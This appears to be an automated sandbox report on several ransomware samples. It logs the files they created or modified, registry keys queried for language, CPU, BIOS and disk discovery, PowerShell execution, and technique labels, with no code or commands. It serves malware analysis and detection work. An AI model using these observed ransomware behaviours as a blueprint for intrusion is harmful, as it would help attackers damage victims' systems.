File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\skypex-icon-white.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-150_contrast-black.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-black\LargeTile.scale-125.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\mscorlib.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\dynalink.md C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libuleaddvaudio_plugin.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\1px.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-black_targetsize-64.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_2019.807.41.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hwrusash.dat.exe C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\it-IT\TipRes.dll.mui C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcR_OEM_Perp-ul-oob.xrm-ms.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\Timer3Sec.targetsize-20.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-96_altform-unplated.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\security\public_suffix_list.dat C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_MAKC2R-ul-phn.xrm-ms C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-96_altform-unplated.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\MSFT_PackageManagement.psm1.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-file-l1-2-0.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_it.properties C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-math-l1-1-0.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Trial-pl.xrm-ms C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-180.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosWideTile.contrast-white_scale-125.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\Timer10Sec.targetsize-64.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_altform-unplated_contrast-white.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-32.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SplashScreen.scale-100.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.Serialization.Json.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Security.AccessControl.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Internet Explorer\fr-FR\iexplore.exe.mui.exe C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\j2pkcs11.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-140.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\WideTile.scale-125.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe\Microsoft.Advertising.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-36_altform-lightunplated.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jopt-simple.md.exe C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\zbhnd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\ChickiMiki Design.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Cntrlphse.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
